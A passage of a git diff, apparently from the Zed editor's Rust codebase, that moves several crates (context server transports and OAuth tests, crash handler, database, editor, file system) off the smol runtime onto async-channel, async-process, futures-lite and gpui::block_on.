--- a/crates/collab/Cargo.toml +++ b/crates/collab/Cargo.toml @@ -76,6 +76,7 @@ uuid.workspace = true [dev-dependencies] agent = { workspace = true, features = ["test-support"] } async-trait.workspace = true +async-channel.workspace = true buffer_diff.workspace = true call = { workspace = true, features = ["test-support"] } diff --git a/crates/collab/tests/integration/editor_tests.rs b/crates/collab/tests/integration/editor_tests.rs index 4eca02280ebe15..2c723a833f38a1 100644 --- a/crates/collab/tests/integration/editor_tests.rs +++ b/crates/collab/tests/integration/editor_tests.rs @@ -2739,9 +2739,9 @@ async fn test_lsp_pull_diagnostics( let closure_workspace_diagnostics_pulls_result_ids = workspace_diagnostics_pulls_result_ids.clone(); let (workspace_diagnostic_cancel_tx, closure_workspace_diagnostic_cancel_rx) = - smol::channel::bounded::<()>(1); + async_channel::bounded::<()>(1); let (closure_workspace_diagnostic_received_tx, workspace_diagnostic_received_rx) = - smol::channel::bounded::<()>(1); + async_channel::bounded::<()>(1); let capabilities = lsp::ServerCapabilities { diagnostic_provider: Some(lsp::DiagnosticServerCapabilities::Options( diff --git a/crates/context_server/Cargo.toml b/crates/context_server/Cargo.toml index dea98bd69e0c28..3a51accb7805c7 100644 --- a/crates/context_server/Cargo.toml +++ b/crates/context_server/Cargo.toml @@ -16,10 +16,13 @@ test-support = ["gpui/test-support"] [dependencies] anyhow.workspace = true +async-channel.workspace = true +async-process.workspace = true async-trait.workspace = true base64.workspace = true collections.workspace = true futures.workspace = true +futures-lite.workspace = true gpui.workspace = true http_client = { workspace = true, features = ["test-support"] } log.workspace = true @@ -33,7 +36,6 @@ serde.workspace = true settings.workspace = true sha2.workspace = true slotmap.workspace = true -smol.workspace = true tempfile.workspace = true tiny_http.workspace = true url = { workspace = true, features = ["serde"] } @@ -41,3 +43,4 @@ util.workspace = true [dev-dependencies] gpui = { workspace = true, features = ["test-support"] } +pollster.workspace = true diff --git a/crates/context_server/src/client.rs b/crates/context_server/src/client.rs index 974c25d7297719..676baef97326b4 100644 --- a/crates/context_server/src/client.rs +++ b/crates/context_server/src/client.rs @@ -1,13 +1,13 @@ use anyhow::{Context as _, Result, anyhow}; use collections::HashMap; use futures::{FutureExt, StreamExt, channel::oneshot, future, select}; +use futures_lite::future::yield_now; use gpui::{AppContext as _, AsyncApp, BackgroundExecutor, Task}; use parking_lot::Mutex; use postage::barrier; use serde::{Deserialize, Serialize, de::DeserializeOwned}; use serde_json::{Value, value::RawValue}; use slotmap::SlotMap; -use smol::channel; use std::{ fmt, path::PathBuf, @@ -49,7 +49,7 @@ pub enum RequestId { pub(crate) struct Client { server_id: ContextServerId, next_id: AtomicI32, - outbound_tx: channel::Sender, + outbound_tx: async_channel::Sender, name: Arc, subscription_set: Arc>, response_handlers: Arc>>>, @@ -197,7 +197,7 @@ impl Client { request_timeout: Option, cx: AsyncApp, ) -> Result { - let (outbound_tx, outbound_rx) = channel::unbounded::(); + let (outbound_tx, outbound_rx) = async_channel::unbounded::(); let (output_done_tx, output_done_rx) = barrier::channel(); let subscription_set = Arc::new(Mutex::new(NotificationSubscriptionSet::default())); @@ -304,7 +304,7 @@ impl Client { } } - smol::future::yield_now().await; + yield_now().await; Ok(()) } @@ -324,7 +324,7 @@ impl Client { /// writes them to the server's stdin, and manages the lifecycle of response handlers. async fn handle_output( transport: Arc, - outbound_rx: channel::Receiver, + outbound_rx: async_channel::Receiver, output_done_tx: barrier::Sender, response_handlers: Arc>>>, last_transport_error: Arc>>, diff --git a/crates/context_server/src/listener.rs b/crates/context_server/src/listener.rs index ad70c6d32e1ef6..2e395e493cc98a 100644 --- a/crates/context_server/src/listener.rs +++ b/crates/context_server/src/listener.rs @@ -1,6 +1,8 @@ use ::serde::{Deserialize, Serialize}; use anyhow::{Context as _, Result}; use collections::HashMap; +use futures::AsyncReadExt; +use futures::stream::StreamExt; use futures::{ AsyncBufReadExt, AsyncRead, AsyncWrite, AsyncWriteExt, FutureExt, channel::mpsc::{UnboundedReceiver, UnboundedSender, unbounded}, @@ -12,7 +14,6 @@ use net::async_net::{UnixListener, UnixStream}; use schemars::JsonSchema; use serde::de::DeserializeOwned; use serde_json::{json, value::RawValue}; -use smol::stream::StreamExt; use std::{ any::TypeId, cell::RefCell, @@ -201,7 +202,7 @@ impl McpServer { handlers: Rc>>, cx: &mut AsyncApp, ) { - let (read, write) = smol::io::split(stream); + let (read, write) = stream.split(); let (incoming_tx, mut incoming_rx) = unbounded(); let (outgoing_tx, outgoing_rx) = unbounded(); diff --git a/crates/context_server/src/oauth.rs b/crates/context_server/src/oauth.rs index 1a314de2fca9b9..de6b7d50e8a020 100644 --- a/crates/context_server/src/oauth.rs +++ b/crates/context_server/src/oauth.rs @@ -1962,7 +1962,7 @@ mod tests { #[test] fn test_fetch_protected_resource_metadata() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2008,7 +2008,7 @@ mod tests { #[test] fn test_fetch_protected_resource_metadata_prefers_www_authenticate_url() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2046,7 +2046,7 @@ mod tests { #[test] fn test_fetch_protected_resource_metadata_rejects_cross_origin_url() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2089,7 +2089,7 @@ mod tests { #[test] fn test_fetch_auth_server_metadata() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2134,7 +2134,7 @@ mod tests { #[test] fn test_fetch_auth_server_metadata_falls_back_to_oidc() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2167,7 +2167,7 @@ mod tests { #[test] fn test_fetch_auth_server_metadata_rejects_issuer_mismatch() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2205,7 +2205,7 @@ mod tests { #[test] fn test_full_discover_with_cimd() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2257,7 +2257,7 @@ mod tests { #[test] fn test_full_discover_with_dcr_fallback() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2320,7 +2320,7 @@ mod tests { #[test] fn test_discover_fails_without_pkce_support() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2370,7 +2370,7 @@ mod tests { #[test] fn test_exchange_code_success() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2420,7 +2420,7 @@ mod tests { #[test] fn test_refresh_tokens_success() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2459,7 +2459,7 @@ mod tests { #[test] fn test_exchange_code_failure() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|_req| { Box::pin(async move { json_response(400, r#"{"error": "invalid_grant"}"#) }) }); @@ -2494,7 +2494,7 @@ mod tests { #[test] fn test_perform_dcr() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|_req| { Box::pin(async move { json_response( @@ -2522,7 +2522,7 @@ mod tests { #[test] fn test_perform_dcr_failure() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|_req| { Box::pin( async move { json_response(403, r#"{"error": "registration_not_allowed"}"#) }, @@ -2693,7 +2693,7 @@ mod tests { #[test] fn test_mcp_oauth_provider_refresh_without_refresh_token_returns_false() { - smol::block_on(async { + gpui::block_on(async { let session = make_test_session("token", None, None); let provider = McpOAuthTokenProvider::new( session, @@ -2710,7 +2710,7 @@ mod tests { #[test] fn test_mcp_oauth_provider_refresh_updates_session_and_notifies_channel() { - smol::block_on(async { + gpui::block_on(async { let session = make_test_session("old-access", Some("my-refresh-token"), None); let (tx, mut rx) = futures::channel::mpsc::unbounded(); @@ -2744,7 +2744,7 @@ mod tests { #[test] fn test_mcp_oauth_provider_refresh_preserves_old_refresh_token_when_server_omits_it() { - smol::block_on(async { + gpui::block_on(async { let session = make_test_session("old-access", Some("original-refresh"), None); let (tx, mut rx) = futures::channel::mpsc::unbounded(); @@ -2776,7 +2776,7 @@ mod tests { #[test] fn test_mcp_oauth_provider_refresh_returns_false_on_http_error() { - smol::block_on(async { + gpui::block_on(async { let session = make_test_session("old-access", Some("my-refresh"), None); let http_client = make_fake_http_client(|_req| { diff --git a/crates/context_server/src/transport/http.rs b/crates/context_server/src/transport/http.rs index 3e002983b5e490..47e31c7abc7b1d 100644 --- a/crates/context_server/src/transport/http.rs +++ b/crates/context_server/src/transport/http.rs @@ -5,7 +5,6 @@ use futures::{Stream, StreamExt}; use gpui::BackgroundExecutor; use http_client::{AsyncBody, HttpClient, Request, Response, http::Method}; use parking_lot::Mutex as SyncMutex; -use smol::channel; use std::{pin::Pin, sync::Arc}; use crate::oauth::{self, OAuthTokenProvider, WwwAuthenticate}; @@ -43,10 +42,10 @@ pub struct HttpTransport { endpoint: String, session_id: Arc>>, executor: BackgroundExecutor, - response_tx: channel::Sender, - response_rx: channel::Receiver, - error_tx: channel::Sender, - error_rx: channel::Receiver, + response_tx: async_channel::Sender, + response_rx: async_channel::Receiver, + error_tx: async_channel::Sender, + error_rx: async_channel::Receiver, /// Static headers to include in every request (e.g. from server config). headers: HashMap, /// When set, the transport attaches `Authorization: Bearer` headers and @@ -71,8 +70,8 @@ impl HttpTransport { executor: BackgroundExecutor, token_provider: Option>, ) -> Self { - let (response_tx, response_rx) = channel::unbounded(); - let (error_tx, error_rx) = channel::unbounded(); + let (response_tx, response_rx) = async_channel::unbounded(); + let (error_tx, error_rx) = async_channel::unbounded(); Self { http_client, @@ -241,62 +240,63 @@ impl HttpTransport { let error_tx = self.error_tx.clone(); // Spawn a task to handle the SSE stream - smol::spawn(async move { - let reader = futures::io::BufReader::new(response.body_mut()); - let mut lines = futures::AsyncBufReadExt::lines(reader); - - let mut data_buffer = Vec::new(); - let mut in_message = false; - - while let Some(line_result) = lines.next().await { - match line_result { - Ok(line) => { - if line.is_empty() { - // Empty line signals end of event - if !data_buffer.is_empty() { - let message = data_buffer.join("\n"); - - // Filter out ping messages and empty data - if !message.trim().is_empty() && message != "ping" { - if let Err(e) = response_tx.send(message).await { - log::error!("Failed to send SSE message: {}", e); - break; + self.executor + .spawn(async move { + let reader = futures::io::BufReader::new(response.body_mut()); + let mut lines = futures::AsyncBufReadExt::lines(reader); + + let mut data_buffer = Vec::new(); + let mut in_message = false; + + while let Some(line_result) = lines.next().await { + match line_result { + Ok(line) => { + if line.is_empty() { + // Empty line signals end of event + if !data_buffer.is_empty() { + let message = data_buffer.join("\n"); + + // Filter out ping messages and empty data + if !message.trim().is_empty() && message != "ping" { + if let Err(e) = response_tx.send(message).await { + log::error!("Failed to send SSE message: {}", e); + break; + } } + data_buffer.clear(); } - data_buffer.clear(); - } - in_message = false; - } else if let Some(data) = line.strip_prefix("data: ") { - // Handle data lines - let data = data.trim(); - if !data.is_empty() { - // Check if this is a ping message - if data == "ping" { - log::trace!("Received SSE ping"); - continue; + in_message = false; + } else if let Some(data) = line.strip_prefix("data: ") { + // Handle data lines + let data = data.trim(); + if !data.is_empty() { + // Check if this is a ping message + if data == "ping" { + log::trace!("Received SSE ping"); + continue; + } + data_buffer.push(data.to_string()); + in_message = true; } - data_buffer.push(data.to_string()); - in_message = true; + } else if line.starts_with("event:") + || line.starts_with("id:") + || line.starts_with("retry:") + { + // Ignore other SSE fields + continue; + } else if in_message { + // Continuation of data + data_buffer.push(line); } - } else if line.starts_with("event:") - || line.starts_with("id:") - || line.starts_with("retry:") - { - // Ignore other SSE fields - continue; - } else if in_message { - // Continuation of data - data_buffer.push(line); } - } - Err(e) => { - let _ = error_tx.send(format!("SSE stream error: {}", e)).await; - break; + Err(e) => { + let _ = error_tx.send(format!("SSE stream error: {}", e)).await; + break; + } } } - } - }) - .detach(); + }) + .detach(); Ok(()) } diff --git a/crates/context_server/src/transport/stdio_transport.rs b/crates/context_server/src/transport/stdio_transport.rs index 0b5525a3a5af44..4bf4b77cda7f3a 100644 --- a/crates/context_server/src/transport/stdio_transport.rs +++ b/crates/context_server/src/transport/stdio_transport.rs @@ -2,14 +2,13 @@ use std::path::PathBuf; use std::pin::Pin; use anyhow::{Context as _, Result}; +use async_process::Child; use async_trait::async_trait; use futures::io::{BufReader, BufWriter}; use futures::{ AsyncBufReadExt as _, AsyncRead, AsyncWrite, AsyncWriteExt as _, Stream, StreamExt as _, }; use gpui::AsyncApp; -use smol::channel; -use smol::process::Child; use util::TryFutureExt as _; use util::shell::Shell; use util::shell_builder::ShellBuilder; @@ -18,9 +17,9 @@ use crate::client::ModelContextServerBinary; use crate::transport::Transport; pub struct StdioTransport { - stdout_sender: channel::Sender, - stdin_receiver: channel::Receiver, - stderr_receiver: channel::Receiver, + stdout_sender: async_channel::Sender, + stdin_receiver: async_channel::Receiver, + stderr_receiver: async_channel::Receiver, server: Child, } @@ -53,9 +52,9 @@ impl StdioTransport { let stdout = server.stdout.take().unwrap(); let stderr = server.stderr.take().unwrap(); - let (stdin_sender, stdin_receiver) = channel::unbounded::(); - let (stdout_sender, stdout_receiver) = channel::unbounded::(); - let (stderr_sender, stderr_receiver) = channel::unbounded::(); + let (stdin_sender, stdin_receiver) = async_channel::unbounded::(); + let (stdout_sender, stdout_receiver) = async_channel::unbounded::(); + let (stderr_sender, stderr_receiver) = async_channel::unbounded::(); cx.spawn(async move |_| Self::handle_output(stdin, stdout_receiver).log_err().await) .detach(); @@ -74,7 +73,7 @@ impl StdioTransport { }) } - async fn handle_input(stdin: Stdout, inbound_rx: channel::Sender) + async fn handle_input(stdin: Stdout, inbound_rx: async_channel::Sender) where Stdout: AsyncRead + Unpin + Send + 'static, { @@ -93,7 +92,7 @@ impl StdioTransport { async fn handle_output( stdin: Stdin, - outbound_rx: channel::Receiver, + outbound_rx: async_channel::Receiver, ) -> Result<()> where Stdin: AsyncWrite + Unpin + Send + 'static, @@ -110,7 +109,7 @@ impl StdioTransport { Ok(()) } - async fn handle_err(stderr: Stderr, stderr_tx: channel::Sender) + async fn handle_err(stderr: Stderr, stderr_tx: async_channel::Sender) where Stderr: AsyncRead + Unpin + Send + 'static, { diff --git a/crates/crashes/Cargo.toml b/crates/crashes/Cargo.toml index 2c13dc83c5a88c..6886e5808aa542 100644 --- a/crates/crashes/Cargo.toml +++ b/crates/crashes/Cargo.toml @@ -6,6 +6,7 @@ edition.workspace = true license = "GPL-3.0-or-later" [dependencies] +async-process.workspace = true cfg-if.workspace = true crash-handler.workspace = true futures.workspace = true @@ -14,7 +15,6 @@ minidumper.workspace = true parking_lot.workspace = true paths.workspace = true release_channel.workspace = true -smol.workspace = true serde.workspace = true serde_json.workspace = true system_specs.workspace = true diff --git a/crates/crashes/src/crashes.rs b/crates/crashes/src/crashes.rs index 9f18088b0ec2e7..9abe7eb8b402f3 100644 --- a/crates/crashes/src/crashes.rs +++ b/crates/crashes/src/crashes.rs @@ -8,7 +8,7 @@ use serde::{Deserialize, Serialize}; use std::mem; #[cfg(not(target_os = "windows"))] -use smol::process::Command; +use async_process::Command; use system_specs::GpuSpecs; #[cfg(target_os = "macos")] @@ -57,7 +57,11 @@ fn should_install_crash_handler() -> bool { /// The synchronous portion (signal handlers, panic hook) runs inline. /// The async keepalive task is passed to `spawn` so the caller decides /// which executor to schedule it on. -pub fn init(crash_init: InitCrashHandler, spawn: impl FnOnce(BoxFuture<'static, ()>)) { +pub fn init + Send + Sync + 'static>( + crash_init: InitCrashHandler, + spawn: impl FnOnce(BoxFuture<'static, ()>), + wait_timer: impl (Fn(Duration) -> F) + Send + Sync + 'static, +) { if !should_install_crash_handler() { let old_hook = panic::take_hook(); panic::set_hook(Box::new(move |info| { @@ -102,12 +106,18 @@ pub fn init(crash_init: InitCrashHandler, spawn: impl FnOnce(BoxFuture<'static, info!("crash signal handlers installed"); - spawn(Box::pin(connect_and_keepalive(crash_init, handler))); + spawn(Box::pin(connect_and_keepalive( + crash_init, handler, wait_timer, + ))); } /// Spawn the crash-handler subprocess, connect the IPC client, and run the /// keepalive ping loop. Called on a background executor by [`init`]. -async fn connect_and_keepalive(crash_init: InitCrashHandler, handler: CrashHandler) { +async fn connect_and_keepalive + Send + Sync + 'static>( + crash_init: InitCrashHandler, + handler: CrashHandler, + wait_timer: impl (Fn(Duration) -> F) + Send + Sync + 'static, +) { let exe = env::current_exe().expect("unable to find ourselves"); let zed_pid = process::id(); let socket_name = paths::temp_dir().join(format!("zed-crash-handler-{zed_pid}")); @@ -134,9 +144,7 @@ async fn connect_and_keepalive(crash_init: InitCrashHandler, handler: CrashHandl break; } elapsed += retry_frequency; - // Crash reporting is called outside of gpui in the remote server right now - #[allow(clippy::disallowed_methods)] - smol::Timer::after(retry_frequency).await; + wait_timer(retry_frequency).await; } let client = maybe_client.unwrap(); let client = Arc::new(client); @@ -157,9 +165,7 @@ async fn connect_and_keepalive(crash_init: InitCrashHandler, handler: CrashHandl loop { client.ping().ok(); - // Crash reporting is called outside of gpui in the remote server right now - #[allow(clippy::disallowed_methods)] - smol::Timer::after(Duration::from_secs(10)).await; + wait_timer(Duration::from_secs(10)).await; } } diff --git a/crates/db/Cargo.toml b/crates/db/Cargo.toml index 2fc790181a8639..36e914715bb309 100644 --- a/crates/db/Cargo.toml +++ b/crates/db/Cargo.toml @@ -23,7 +23,6 @@ inventory.workspace = true log.workspace = true paths.workspace = true release_channel.workspace = true -smol.workspace = true sqlez.workspace = true sqlez_macros.workspace = true util.workspace = true diff --git a/crates/db/src/db.rs b/crates/db/src/db.rs index da418b26e8d3cc..7cb4def94ffbf8 100644 --- a/crates/db/src/db.rs +++ b/crates/db/src/db.rs @@ -9,7 +9,6 @@ use gpui::{App, AppContext, Global}; pub use indoc::indoc; pub use inventory; pub use paths::database_dir; -pub use smol; pub use sqlez; pub use sqlez_macros; pub use uuid; @@ -19,6 +18,7 @@ use release_channel::ReleaseChannel; use sqlez::domain::Migrator; use sqlez::thread_safe_connection::ThreadSafeConnection; use sqlez_macros::sql; +use std::fs::create_dir_all; use std::future::Future; use std::path::{Path, PathBuf}; use std::sync::atomic::AtomicBool; @@ -62,7 +62,7 @@ impl AppDatabase { /// migrations in dependency order. pub fn new() -> Self { let db_dir = database_dir(); - let connection = smol::block_on(open_db::(db_dir, *RELEASE_CHANNEL)); + let connection = gpui::block_on(open_db::(db_dir, *RELEASE_CHANNEL)); Self(connection) } @@ -71,7 +71,7 @@ impl AppDatabase { #[cfg(any(test, feature = "test-support"))] pub fn test_new() -> Self { let name = format!("test-db-{}", uuid::Uuid::new_v4()); - let connection = smol::block_on(open_test_db::(&name)); + let connection = gpui::block_on(open_test_db::(&name)); Self(connection) } @@ -183,8 +183,7 @@ pub async fn open_db( let connection = maybe!(async { if let Some(parent) = db_path.parent() { - smol::fs::create_dir_all(parent) - .await + create_dir_all(parent) .context("Could not create db directory") .log_err()?; } @@ -397,7 +396,7 @@ mod tests { for _ in 0..10 { let tmp_path = tempdir.path().to_path_buf(); let guard = thread::spawn(move || { - let good_db = smol::block_on(open_db::( + let good_db = gpui::block_on(open_db::( tmp_path.as_path(), release_channel::ReleaseChannel::Dev, )); diff --git a/crates/db/src/kvp.rs b/crates/db/src/kvp.rs index 2dc34e5b022022..a8c4d4dfe55a92 100644 --- a/crates/db/src/kvp.rs +++ b/crates/db/src/kvp.rs @@ -243,7 +243,7 @@ impl std::ops::Deref for GlobalKeyValueStore { static GLOBAL_KEY_VALUE_STORE: std::sync::LazyLock = std::sync::LazyLock::new(|| { let db_dir = crate::database_dir(); - GlobalKeyValueStore(smol::block_on(crate::open_db::( + GlobalKeyValueStore(gpui::block_on(crate::open_db::( db_dir, crate::GlobalDbScope, ))) diff --git a/crates/edit_prediction_cli/src/main.rs b/crates/edit_prediction_cli/src/main.rs index b4951ae9d9f117..0ab16690e6c8ae 100644 --- a/crates/edit_prediction_cli/src/main.rs +++ b/crates/edit_prediction_cli/src/main.rs @@ -988,7 +988,7 @@ fn main() { match &command { Command::ImportBatch(import_args) => { - smol::block_on(async { + gpui::block_on(async { match import_args.provider { BatchProvider::Anthropic => { let client = anthropic_client::AnthropicClient::batch(&paths::LLM_CACHE_DB) @@ -1047,7 +1047,7 @@ fn main() { output_dir, fresh: synth_args.fresh, }; - smol::block_on(async { + gpui::block_on(async { if let Err(e) = run_synthesize(config).await { eprintln!("Error: {:?}", e); std::process::exit(1); diff --git a/crates/editor/Cargo.toml b/crates/editor/Cargo.toml index 1b2e32f19896df..e97cc68c2f956e 100644 --- a/crates/editor/Cargo.toml +++ b/crates/editor/Cargo.toml @@ -46,6 +46,7 @@ emojis.workspace = true feature_flags.workspace = true file_icons.workspace = true futures.workspace = true +futures-lite.workspace = true fuzzy.workspace = true fs.workspace = true git.workspace = true @@ -75,7 +76,6 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true snippet.workspace = true sum_tree.workspace = true task.workspace = true diff --git a/crates/editor/src/display_map.rs b/crates/editor/src/display_map.rs index d00376fc02039e..552eca261e9786 100644 --- a/crates/editor/src/display_map.rs +++ b/crates/editor/src/display_map.rs @@ -2582,9 +2582,9 @@ pub mod tests { }; use lsp::LanguageServerId; + use futures::stream::StreamExt; use rand::{Rng, prelude::*}; use settings::{SettingsContent, SettingsStore}; - use smol::stream::StreamExt; use std::{env, sync::Arc}; use text::PointUtf16; use theme::{LoadThemes, SyntaxTheme}; diff --git a/crates/editor/src/display_map/wrap_map.rs b/crates/editor/src/display_map/wrap_map.rs index 4ff11b1ef67971..44a4689b28564c 100644 --- a/crates/editor/src/display_map/wrap_map.rs +++ b/crates/editor/src/display_map/wrap_map.rs @@ -4,10 +4,11 @@ use super::{ fold_map::{Chunk, FoldRows}, tab_map::{self, TabEdit, TabPoint, TabSnapshot}, }; + +use futures_lite::future::yield_now; use gpui::{App, AppContext as _, Context, Entity, Font, LineWrapper, Pixels, Task}; use language::{LanguageAwareStyling, Point}; use multi_buffer::{MultiBufferSnapshot, RowInfo}; -use smol::future::yield_now; use std::{cmp, collections::VecDeque, mem, ops::Range, sync::LazyLock, time::Duration}; use sum_tree::{Bias, Cursor, Dimensions, SumTree}; use text::Patch; @@ -205,7 +206,7 @@ impl WrapMap { }]; if total_rows < WRAP_YIELD_ROW_INTERVAL { - let edits = smol::block_on(new_snapshot.update( + let edits = gpui::block_on(new_snapshot.update( tab_snapshot, &tab_edits, wrap_width, @@ -299,7 +300,7 @@ impl WrapMap { < WRAP_YIELD_ROW_INTERVAL && let Some((tab_snapshot, tab_edits)) = pending_edits.pop_back() { - let wrap_edits = smol::block_on(snapshot.update( + let wrap_edits = gpui::block_on(snapshot.update( tab_snapshot, &tab_edits, wrap_width, @@ -1357,10 +1358,10 @@ mod tests { display_map::{fold_map::FoldMap, inlay_map::InlayMap, tab_map::TabMap}, test::test_font, }; + use futures::stream::StreamExt; use gpui::{LineFragment, px, test::observe}; use rand::prelude::*; use settings::SettingsStore; - use smol::stream::StreamExt; use std::{cmp, env, num::NonZeroU32}; use text::Rope; use theme::LoadThemes; diff --git a/crates/editor/src/hover_popover.rs b/crates/editor/src/hover_popover.rs index 90d57d478712fe..24fdce51ba6379 100644 --- a/crates/editor/src/hover_popover.rs +++ b/crates/editor/src/hover_popover.rs @@ -1204,13 +1204,13 @@ mod tests { test::editor_lsp_test_context::EditorLspTestContext, }; use collections::BTreeSet; + use futures::stream::StreamExt; use gpui::App; use indoc::indoc; use markdown::parser::MarkdownEvent; use project::InlayId; use settings::InlayHintSettingsContent; use settings::{DelayMs, SettingsStore}; - use smol::stream::StreamExt; use std::sync::atomic; use std::sync::atomic::AtomicUsize; use text::Bias; diff --git a/crates/editor/src/lsp_ext.rs b/crates/editor/src/lsp_ext.rs index 6f9f94bc72227f..60f0dd305ef81a 100644 --- a/crates/editor/src/lsp_ext.rs +++ b/crates/editor/src/lsp_ext.rs @@ -3,6 +3,7 @@ use std::time::Duration; use crate::Editor; use collections::{HashMap, HashSet}; +use futures_lite::FutureExt as _; use gpui::AsyncApp; use gpui::{App, Entity, Task}; use language::Buffer; @@ -14,7 +15,6 @@ use project::LocationLink; use project::Project; use project::TaskSourceKind; use project::lsp_store::lsp_ext_command::GetLspRunnables; -use smol::future::FutureExt as _; use task::ResolvedTask; use task::TaskContext; use text::BufferId; diff --git a/crates/editor/src/test/editor_lsp_test_context.rs b/crates/editor/src/test/editor_lsp_test_context.rs index d1e5270d6c76e1..854a800d7101d7 100644 --- a/crates/editor/src/test/editor_lsp_test_context.rs +++ b/crates/editor/src/test/editor_lsp_test_context.rs @@ -13,6 +13,7 @@ use serde_json::json; use crate::{Editor, ToPoint}; use collections::HashSet; use futures::Future; +use futures::stream::StreamExt; use gpui::{Context, Entity, Focusable as _, VisualTestContext, Window}; use indoc::indoc; use language::{ @@ -21,7 +22,6 @@ use language::{ }; use lsp::{notification, request}; use project::Project; -use smol::stream::StreamExt; use workspace::{AppState, MultiWorkspace, Workspace, WorkspaceHandle}; use super::editor_test_context::{AssertionContextManager, EditorTestContext}; diff --git a/crates/fs/Cargo.toml b/crates/fs/Cargo.toml index eefe2717f229d5..bf47e0ee135645 100644 --- a/crates/fs/Cargo.toml +++ b/crates/fs/Cargo.toml @@ -19,6 +19,7 @@ path = "tests/integration/main.rs" [dependencies] anyhow.workspace = true +async-channel.workspace = true async-tar.workspace = true async-trait.workspace = true collections.workspace = true diff --git a/crates/fs/src/fake_git_repo.rs b/crates/fs/src/fake_git_repo.rs index 3b34d54a6ae3a4..309b6a84a650a8 100644 --- a/crates/fs/src/fake_git_repo.rs +++ b/crates/fs/src/fake_git_repo.rs @@ -2,7 +2,9 @@ use std::path::Path; use crate::{FakeFs, FakeFsEntry, Fs, RemoveOptions, RenameOptions}; use anyhow::{Context as _, Result, bail}; +use async_channel::Sender; use collections::{HashMap, HashSet}; +use futures::FutureExt as _; use futures::future::{self, BoxFuture, join_all}; use git::repository::GitCommitTemplate; use git::{ @@ -24,7 +26,6 @@ use gpui::{AsyncApp, BackgroundExecutor, SharedString, Task}; use ignore::gitignore::GitignoreBuilder; use parking_lot::Mutex; use rope::Rope; -use smol::{channel::Sender, future::FutureExt as _}; use std::{path::PathBuf, sync::Arc, sync::atomic::AtomicBool}; use text::LineEnding; use util::{paths::PathStyle, rel_path::RelPath}; @@ -56,7 +57,7 @@ pub enum FakeCommitDataEntry { #[derive(Debug, Clone)] pub struct FakeGitRepositoryState { pub commit_history: Vec, - pub event_emitter: smol::channel::Sender, + pub event_emitter: async_channel::Sender, pub unmerged_paths: HashMap, pub head_contents: HashMap, pub index_contents: HashMap, @@ -78,7 +79,7 @@ pub struct FakeGitRepositoryState { } impl FakeGitRepositoryState { - pub fn new(event_emitter: smol::channel::Sender) -> Self { + pub fn new(event_emitter: async_channel::Sender) -> Self { FakeGitRepositoryState { event_emitter, head_contents: Default::default(), diff --git a/crates/fs/src/fs.rs b/crates/fs/src/fs.rs index 709b037c05a015..5b505d4d7a0acc 100644 --- a/crates/fs/src/fs.rs +++ b/crates/fs/src/fs.rs @@ -1200,7 +1200,7 @@ impl Fs for RealFs { let use_poll = requires_poll_watcher(path); let watch_path = effective_watch_path(path); - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let pending_paths: Arc>> = Default::default(); let mode = if use_poll { @@ -1449,8 +1449,8 @@ struct FakeFsState { root: FakeFsEntry, next_inode: u64, next_mtime: SystemTime, - git_event_tx: smol::channel::Sender, - event_txs: Vec<(PathBuf, smol::channel::Sender>)>, + git_event_tx: async_channel::Sender, + event_txs: Vec<(PathBuf, async_channel::Sender>)>, events_paused: bool, buffered_events: Vec, metadata_call_count: usize, @@ -1720,7 +1720,7 @@ impl FakeFs { const SYSTEMTIME_INTERVAL: Duration = Duration::from_nanos(100); pub fn new(executor: gpui::BackgroundExecutor) -> Arc { - let (tx, rx) = smol::channel::bounded::(10); + let (tx, rx) = async_channel::bounded::(10); let this = Arc::new_cyclic(|this| Self { this: this.clone(), @@ -2714,7 +2714,7 @@ impl FakeFsEntry { #[cfg(feature = "test-support")] struct FakeWatcher { - tx: smol::channel::Sender>, + tx: async_channel::Sender>, original_path: PathBuf, fs_state: Arc>, prefixes: Mutex>, @@ -3183,7 +3183,7 @@ impl Fs for FakeFs { Arc, ) { self.simulate_random_delay().await; - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let path = path.to_path_buf(); self.state.lock().event_txs.push((path.clone(), tx.clone())); let executor = self.executor.clone(); diff --git a/crates/fs/src/fs_watcher.rs b/crates/fs/src/fs_watcher.rs index 909424558b7554..6db36992dece57 100644 --- a/crates/fs/src/fs_watcher.rs +++ b/crates/fs/src/fs_watcher.rs @@ -19,7 +19,7 @@ pub enum WatcherMode { } pub struct FsWatcher { - tx: smol::channel::Sender<()>, + tx: async_channel::Sender<()>, pending_path_events: Arc>>, registrations: Mutex, WatcherRegistrationId>>, mode: WatcherMode, @@ -27,7 +27,7 @@ pub struct FsWatcher { impl FsWatcher { pub fn new( - tx: smol::channel::Sender<()>, + tx: async_channel::Sender<()>, pending_path_events: Arc>>, mode: WatcherMode, ) -> Self { diff --git a/crates/fs/tests/integration/fs.rs b/crates/fs/tests/integration/fs.rs index 97ec90bea09651..b27e4113fd6cf7 100644 --- 